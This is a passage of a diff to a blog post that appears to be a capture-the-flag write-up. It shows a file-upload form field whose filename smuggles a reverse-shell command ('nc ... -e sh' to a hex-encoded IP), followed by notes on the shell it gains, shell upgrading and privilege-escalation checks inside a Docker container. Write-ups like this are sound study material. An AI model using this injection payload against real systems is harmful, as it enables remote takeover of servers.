cbev0x/cbev0x.github.io/_posts/2026-01-27-TempusFugitDurius.md

 Content-Disposition: form-data; name="file"; filename="a.txt;nc 0xC0A89049 9001 -e sh"
 ```

 In this case I had to transform my IP to hex in order to cut a few characters off and rename my valid file to a.txt.
-After that is taken care off, we get a successful shell on the server as www.
+After that is taken care off, we get a successful shell on the server as `www`.
 Let's start looking for ways to escalate privileges to root as there are no other users on the system.
 I also upgrade my shell using the typical python3 -c import pty method.

 I begin with some manual enumeration on any writable files for our current user and any SUID bits set for valuable files but don't find anything.
 A quick check in the `/` dir shows a `.dockerenv` file meaning we're in a Docker container.